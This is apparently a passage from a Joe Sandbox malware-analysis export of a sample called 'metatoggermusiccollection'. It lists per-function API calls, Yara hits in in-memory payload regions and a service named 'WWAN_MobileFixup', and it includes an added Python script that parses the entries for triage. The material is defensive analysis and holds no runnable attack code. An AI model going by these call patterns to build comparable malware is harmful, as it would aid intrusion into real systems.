                                                                            • RtlEncodePointer.NTDLL(007891E0), ref: 02AE831D
                                                                            • _free.LIBCMT ref: 02AE8332
                                                                            • _free.LIBCMT ref: 02AE8348
                                                                            • _free.LIBCMT ref: 02AE8370
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                            • String ID: 8Dx
                                                                            • API String ID: 3064303923-535961141
                                                                            • Opcode ID: d2c88ba6a5b1a43e90c0c17142cf7dd30a2d61dac55fb1811bf769402e6de119
                                                                            • Instruction ID: 2bfa96d05ad699b758d340e9bfb8ab12bb89925c5c5a52ae6f9fc453bd38ac21
                                                                            • Opcode Fuzzy Hash: d2c88ba6a5b1a43e90c0c17142cf7dd30a2d61dac55fb1811bf769402e6de119
                                                                            • Instruction Fuzzy Hash: 68219131CC17218FCE266F14E9C0A0A7BA9AF147A03090969EC0697258DF389C66CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD24E6
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02AD24FC
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02AD250E
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02AD256D
                                                                            • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 02AD257F
                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02AD2599
                                                                            • GetLastError.KERNEL32(?,7591DFB0), ref: 02AD25A2
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02AD25F0
                                                                            • InterlockedDecrement.KERNEL32(00000002), ref: 02AD262F
                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02AD268E
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02AD2699
                                                                            • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02AD26AD
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 02AD26BD
                                                                            • GetLastError.KERNEL32(?,7591DFB0), ref: 02AD26C7
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                            • String ID:
                                                                            • API String ID: 1213838671-0
                                                                            • Opcode ID: d5eda192ed661ad5085bd0276ac7b58ec85186624661cf84906613b0eceeeba3
                                                                            • Instruction ID: c1408b715de0502ea5eb8e4339de59c8dd50cfa89a721d63ef753585ce7bae9e
                                                                            • Opcode Fuzzy Hash: d5eda192ed661ad5085bd0276ac7b58ec85186624661cf84906613b0eceeeba3
                                                                            • Instruction Fuzzy Hash: 3B612CB1940209AFCB50DFE4D988AAEFBB9FF08310F10456AE916E3641DB34E955CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%
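
                                                                            The function entries above follow one fixed layout: an "APIs" block of "• API.Module(args), ref: addr" lines (with "Part of subcall function" lines for callees), a "Memory Dump Source" line naming the dumped region and whether it is backed by a PE image, an optional "Yara matches" marker, and an "API ID" key. The script below is an added example, not Joe Sandbox code: it parses that layout from a constructed sample copied from three of the entries on this page (the 1000 ms Sleep loop at 0040B673, the I/O-completion-port loop at 02AD24E6, and the htons/htonl builder at 02AD4608) and tags each function with the call patterns a triager wants first. The watchlist tags, the "non-PE-backed region" heuristic and the choice of the lowest direct-call reference as the function address are the example's own assumptions, not report fields.

```python
"""Added example (not Joe Sandbox code): parse the per-function 'APIs' blocks of a
Joe Sandbox function-analysis export, like the ones listed above, and tag the
call patterns a triager wants to see first."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three entries copied from the report's listing above.
SAMPLE = """\
APIs
• Sleep.KERNELBASE(000003E8), ref: 0040B673
Memory Dump Source
• Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• API ID: Sleep
APIs
• __EH_prolog.LIBCMT ref: 02AD24E6
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02AD2599
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 02AD26BD
Memory Dump Source
• Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
Yara matches
• API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
APIs
• __EH_prolog.LIBCMT ref: 02AD4608
  • Part of subcall function 02AE3A8F: _malloc.LIBCMT ref: 02AE3AA7
• htons.WS2_32(?), ref: 02AD4669
• htonl.WS2_32(00000000), ref: 02AD4693
• _sprintf.LIBCMT ref: 02AD475D
Memory Dump Source
• Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
Yara matches
• API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
"""

CALL_RE = re.compile(
    r"•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)")
SOURCE_RE = re.compile(
    r"Source File:\s+(?P<file>\S+),\s+Offset:\s+(?P<off>[0-9A-Fa-f]+),\s+based on PE:\s+(?P<pe>true|false)")

# Assumed watchlist (example's own): tags describe the call, not the author's intent.
WATCHLIST = {
    "Sleep": "timing delay",
    "VirtualAlloc": "dynamic memory allocation",
    "htons": "network byte order (address/protocol field build)",
    "htonl": "network byte order (address/protocol field build)",
    "GetQueuedCompletionStatus": "I/O completion port loop",
    "PostQueuedCompletionStatus": "I/O completion port loop",
}

@dataclass
class Call:
    api: str
    module: str
    args: list                        # int per hex literal, None per '?'
    ref: int
    subcall_of: Optional[int] = None  # set on 'Part of subcall function' lines

@dataclass
class FunctionEntry:
    api_id: str = ""
    calls: list = field(default_factory=list)
    offset: int = 0
    pe_backed: bool = False
    yara: bool = False

def _args(raw):
    if not raw:
        return []
    return [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]

def parse_entries(text):
    entries, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":                       # every function block starts here
            cur = FunctionEntry()
            entries.append(cur)
        elif cur is None:
            continue
        elif (m := CALL_RE.search(s)):
            cur.calls.append(Call(m["api"], m["mod"], _args(m["args"]), int(m["ref"], 16),
                                  int(m["sub"], 16) if m["sub"] else None))
        elif (m := SOURCE_RE.search(s)):
            cur.offset, cur.pe_backed = int(m["off"], 16), m["pe"] == "true"
        elif s == "Yara matches":
            cur.yara = True
        elif s.startswith("• API ID:"):
            cur.api_id = s.split(":", 1)[1].strip()
    return entries

def triage(entry):
    direct = [c for c in entry.calls if c.subcall_of is None]  # callee lines are not this function's
    tags = {WATCHLIST[c.api] for c in direct if c.api in WATCHLIST}
    for c in direct:
        if c.api == "Sleep" and c.args and c.args[0] is not None:
            tags.add(f"Sleep {c.args[0]} ms")
    # Heuristic (assumption): a Yara hit in a region not backed by an on-disk PE
    # is the in-memory code the report's unpacking signatures refer to.
    if entry.yara and not entry.pe_backed:
        tags.add("yara hit in non-PE-backed region")
    return {"address": min(c.ref for c in direct) if direct else 0,  # lowest direct ref
            "api_id": entry.api_id, "tags": sorted(tags)}

def triage_report(text):
    return [triage(e) for e in parse_entries(text)]
```

                                                                            Running triage_report on the sample yields one dict per function; the 0040B673 entry gets "Sleep 1000 ms" and "timing delay", and both 02AD1000-region entries get the non-PE-backed Yara tag, which is the quickest way to separate the on-disk loader code at 00400000 from the in-memory payload when an export has hundreds of entries. Subcall lines are parsed but excluded from tagging so that a callee's API use is not attributed to every caller.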

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD4608
                                                                              • Part of subcall function 02AE3A8F: _malloc.LIBCMT ref: 02AE3AA7
                                                                            • htons.WS2_32(?), ref: 02AD4669
                                                                            • htonl.WS2_32(?), ref: 02AD468C
                                                                            • htonl.WS2_32(00000000), ref: 02AD4693
                                                                            • htons.WS2_32(00000000), ref: 02AD4747
                                                                            • _sprintf.LIBCMT ref: 02AD475D
                                                                              • Part of subcall function 02AD88BF: _memmove.LIBCMT ref: 02AD88DF
                                                                            • htons.WS2_32(?), ref: 02AD46B0
                                                                              • Part of subcall function 02AD966A: __EH_prolog.LIBCMT ref: 02AD966F
                                                                              • Part of subcall function 02AD966A: RtlEnterCriticalSection.NTDLL(00000020), ref: 02AD96EA
                                                                              • Part of subcall function 02AD966A: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02AD9708
                                                                              • Part of subcall function 02AD1BA7: __EH_prolog.LIBCMT ref: 02AD1BAC
                                                                              • Part of subcall function 02AD1BA7: RtlEnterCriticalSection.NTDLL ref: 02AD1BBC
                                                                              • Part of subcall function 02AD1BA7: RtlLeaveCriticalSection.NTDLL ref: 02AD1BEA
                                                                              • Part of subcall function 02AD1BA7: RtlEnterCriticalSection.NTDLL ref: 02AD1C13
                                                                              • Part of subcall function 02AD1BA7: RtlLeaveCriticalSection.NTDLL ref: 02AD1C56
                                                                              • Part of subcall function 02ADDE26: __EH_prolog.LIBCMT ref: 02ADDE2B
                                                                            • htonl.WS2_32(?), ref: 02AD497C
                                                                            • htonl.WS2_32(00000000), ref: 02AD4983
                                                                            • htonl.WS2_32(00000000), ref: 02AD49C8
                                                                            • htonl.WS2_32(00000000), ref: 02AD49CF
                                                                            • htons.WS2_32(?), ref: 02AD49EF
                                                                            • htons.WS2_32(?), ref: 02AD49F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                            • String ID:
                                                                            • API String ID: 1645262487-0
                                                                            • Opcode ID: 15106b0644c51c3f5fe0a15538115e9a076fff66b942c1dac987c5e73be84aa0
                                                                            • Instruction ID: b53f2d978bf9b7972de35f420775520c144fd174e27425b8da4b443e3415ceef
                                                                            • Opcode Fuzzy Hash: 15106b0644c51c3f5fe0a15538115e9a076fff66b942c1dac987c5e73be84aa0
                                                                            • Instruction Fuzzy Hash: FB022871C40259EFEF15DBE4C944BEEBBB9AF08304F10459AE506A7280DB746A49CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(WWAN_MobileFixup 2.33.197.66,Function_0000235E), ref: 004023C1
                                                                            • SetServiceStatus.ADVAPI32(0040A110), ref: 00402420
                                                                            • GetLastError.KERNEL32 ref: 00402422
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                            • GetLastError.KERNEL32 ref: 00402450
                                                                            • SetServiceStatus.ADVAPI32(0040A110), ref: 00402480
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                            • CloseHandle.KERNEL32 ref: 004024A1
                                                                            • SetServiceStatus.ADVAPI32(0040A110), ref: 004024CA
                                                                            Strings
                                                                            • WWAN_MobileFixup 2.33.197.66, xrefs: 004023BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                            • String ID: WWAN_MobileFixup 2.33.197.66
                                                                            • API String ID: 3346042915-2719033208
                                                                            • Opcode ID: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                            • Instruction ID: 16ab96e2cb68f3bca67a8d02827ccf702012fa4ba7b91bfe8048b6e668af4302
                                                                            • Opcode Fuzzy Hash: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                            • Instruction Fuzzy Hash: A621ECB0841310ABC2109F16EF4D9167EB8EBCA758F11413AE105BA2B2C7B94575CFAE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD3428
                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02AD346B
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02AD3472
                                                                            • GetLastError.KERNEL32 ref: 02AD3486
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02AD34D7
                                                                            • RtlEnterCriticalSection.NTDLL(00000018), ref: 02AD34ED
                                                                            • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02AD3518
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                            • String ID: CancelIoEx$KERNEL32
                                                                            • API String ID: 2902213904-434325024
                                                                            • Opcode ID: adbd28b416eced959c6df3d03ec3944d56cb1fcd2639ad4781bb8ff93f0ab6ea
                                                                            • Instruction ID: efbb902213541ebf70fb35894e2b7107e0c684f47bfd8edba4cc8930e5ede20c
                                                                            • Opcode Fuzzy Hash: adbd28b416eced959c6df3d03ec3944d56cb1fcd2639ad4781bb8ff93f0ab6ea
                                                                            • Instruction Fuzzy Hash: 53317EB1900205DFDF11AFA4C984A6ABBF9FF48311F008499E9169B240CF78D911CFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D1D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406530,?,00406580,?,?,?,Runtime Error!Program: ), ref: 00405869
                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405881
                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405892
                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040589F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                            • API String ID: 2238633743-4044615076
                                                                            • Opcode ID: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                            • Instruction ID: 8e14f7a6750b1570260f033f2342e22bcd7c780a38ad1719db35514165c9b09a
                                                                            • Opcode Fuzzy Hash: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                            • Instruction Fuzzy Hash: 9F015232600701AFDB11EFB5AD80A1B3BE8EB45740315043AB909F2591D678D8359F69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LCMapStringW.KERNEL32(00000000,00000100,004065FC,00000001,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405B61
                                                                            • LCMapStringA.KERNEL32(00000000,00000100,004065F8,00000001,00000000,00000000,?,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B7D
                                                                            • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404E93,?,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BC6
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BFE
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C56
                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C6C
                                                                            • LCMapStringW.KERNEL32(00000000,?,00404E93,00000000,00404E93,?,?,00404E93,00200020,00000000,?,00000000), ref: 00405C9F
                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405D07
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: String$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 352835431-0
                                                                            • Opcode ID: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                            • Instruction ID: 228655485731442308ac41690fb54a5bf4aece3cc6a962a44786cceaeb1d8e11
                                                                            • Opcode Fuzzy Hash: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                            • Instruction Fuzzy Hash: 94518931504609AFDF228F55CD45EAF7FB9EB48744F20412AF912B12A0D3398D21DF69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404C66
                                                                            • GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00404D3C
                                                                            • WriteFile.KERNEL32(00000000), ref: 00404D43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandleModuleNameWrite
                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                            • API String ID: 3784150691-4022980321
                                                                            • Opcode ID: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
                                                                            • Instruction ID: f140c2e8ca9dd112070b7b1a63e93dd9695d020ae797257d07982e8dddccbb03
                                                                            • Opcode Fuzzy Hash: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
                                                                            • Instruction Fuzzy Hash: 5531E5B2A012186FEF20E760DE49FDA336CEF85304F1005BBF945B61D0D6B89E548A19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040472B
                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040473F
                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040476B
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047A3
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047C5
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047DE
                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 004047F1
                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040482F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1823725401-0
                                                                            • Opcode ID: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
                                                                            • Instruction ID: 34ba4f5269201e1e594d4a21fe80140370f79d481ab45775fabf70a7e665ef6c
                                                                            • Opcode Fuzzy Hash: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
                                                                            • Instruction Fuzzy Hash: E631C2F75042656FD7207FB99D8483BB69CE6C6358716093BFB42F3280D7798C4182AA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000,3156A85A), ref: 02AE15F0
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AE1605
                                                                            • ResetEvent.KERNEL32(00000000,3156A85A), ref: 02AE160F
                                                                            • CloseHandle.KERNEL32(00000000,3156A85A), ref: 02AE1644
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,3156A85A), ref: 02AE16BA
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AE16CF
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseEventHandle$CreateOpenReset
                                                                            • String ID:
                                                                            • API String ID: 1285874450-0
                                                                            • Opcode ID: 32c12ddb180433a03bdf2cfe43aa0ede098a66dd8bb051aea7ee3101e002c45f
                                                                            • Instruction ID: 9fcaf1d54e8fcd2def0370916918a035bd17fad6bc6d08247aad802cd19b4428
                                                                            • Opcode Fuzzy Hash: 32c12ddb180433a03bdf2cfe43aa0ede098a66dd8bb051aea7ee3101e002c45f
                                                                            • Instruction Fuzzy Hash: 7D4120B0D04368ABDF20DFA5C984BADBBB8AF05714F144619E51AAB280DB749D06CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD20AC
                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02AD20CD
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02AD20D8
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02AD213E
                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02AD217A
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02AD2187
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02AD21A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                            • String ID:
                                                                            • API String ID: 1171374749-0
                                                                            • Opcode ID: e9328ae7008128bfba90026d1cd1f699bfc3cfa6b87ece5b2a421277d3507763
                                                                            • Instruction ID: b2660ca33aac0672fe9c9441980eb578ed4cf05beacc808dd89cceba4bd60d89
                                                                            • Opcode Fuzzy Hash: e9328ae7008128bfba90026d1cd1f699bfc3cfa6b87ece5b2a421277d3507763
                                                                            • Instruction Fuzzy Hash: 75413571544701AFC311DF25C884A6BBBF9EFC8754F004A1EF99A82651DB34E90ACEA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 02AE1E10: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02AE166E,?,?), ref: 02AE1E3F
                                                                              • Part of subcall function 02AE1E10: CloseHandle.KERNEL32(00000000,?,?,02AE166E,?,?), ref: 02AE1E54
                                                                              • Part of subcall function 02AE1E10: SetEvent.KERNEL32(00000000,02AE166E,?,?), ref: 02AE1E67
                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000,3156A85A), ref: 02AE15F0
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AE1605
                                                                            • ResetEvent.KERNEL32(00000000,3156A85A), ref: 02AE160F
                                                                            • CloseHandle.KERNEL32(00000000,3156A85A), ref: 02AE1644
                                                                            • __CxxThrowException@8.LIBCMT ref: 02AE1675
                                                                              • Part of subcall function 02AE449A: RaiseException.KERNEL32(?,?,02ADFA92,?,?,?,?,?,?,?,02ADFA92,?,02B00F78,?), ref: 02AE44EF
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,3156A85A), ref: 02AE16BA
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AE16CF
                                                                              • Part of subcall function 02AE1B50: GetCurrentProcessId.KERNEL32(?), ref: 02AE1BA9
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,3156A85A), ref: 02AE16DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                            • String ID:
                                                                            • API String ID: 2227236058-0
                                                                            • Opcode ID: 70aa251abea3839d4001b1e0fdaded83c7dcb4b9492fd06f468ec949e61a44a6
                                                                            • Instruction ID: 9696b54ae75b277d3cdc96f6d81b79ae918117fd812fa6b07f17f5a023d6c2e3
                                                                            • Opcode Fuzzy Hash: 70aa251abea3839d4001b1e0fdaded83c7dcb4b9492fd06f468ec949e61a44a6
                                                                            • Instruction Fuzzy Hash: 2B3161B1E403689BDF20DBE4DC84BADB7B9AF05715F180119E91EEB280EB309D16CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __init_pointers.LIBCMT ref: 02AE5CD4
                                                                              • Part of subcall function 02AE8442: RtlEncodePointer.NTDLL(00000000), ref: 02AE8445
                                                                              • Part of subcall function 02AE8442: __initp_misc_winsig.LIBCMT ref: 02AE8460
                                                                              • Part of subcall function 02AE8442: GetModuleHandleW.KERNEL32(kernel32.dll,?,02B01578,00000008,00000003,02B00F5C,?,00000001), ref: 02AE91C1
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02AE91D5
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02AE91E8
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02AE91FB
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02AE920E
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02AE9221
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02AE9234
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02AE9247
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02AE925A
